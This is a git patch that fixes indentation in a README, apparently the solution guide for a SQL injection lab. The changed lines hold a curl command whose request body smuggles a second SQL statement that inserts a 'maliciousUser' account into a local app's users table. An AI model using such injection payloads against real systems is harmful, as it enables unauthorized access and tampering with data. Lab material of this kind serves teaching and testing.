From c65d017fe90e7e75686af45c3bf227e75f8564b3 Mon Sep 17 00:00:00 2001
From: Andrew Steurer <andrew.steurer@fermyon.com>
Date: Tue, 13 Aug 2024 22:37:22 -0600
Subject: [PATCH] fixing typo

Signed-off-by: Andrew Steurer <andrew.steurer@fermyon.com>
---
 solution/README.md | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/solution/README.md b/solution/README.md
index 91d19d2..2cd774f 100644
--- a/solution/README.md
+++ b/solution/README.md
@@ -93,10 +93,10 @@ To break down each step of the statement:
 Because the entrypoint for the data is in the body of the request, the SQL statement will need to be sent as a string in the body of the request. Below is the curl request that will insert a malicious user into the users table:
 
 ```sh
-	curl \
-		--request POST \
-		--data-binary "', 1); INSERT INTO users (username, password) VALUES ('maliciousUser', 'p@$$w0rd'); --" \
-		http://localhost:3000/message/1
+curl \
+	--request POST \
+	--data-binary "', 1); INSERT INTO users (username, password) VALUES ('maliciousUser', 'p@$$w0rd'); --" \
+	http://localhost:3000/message/1
 ```
 
 ## Destroying the table data in the database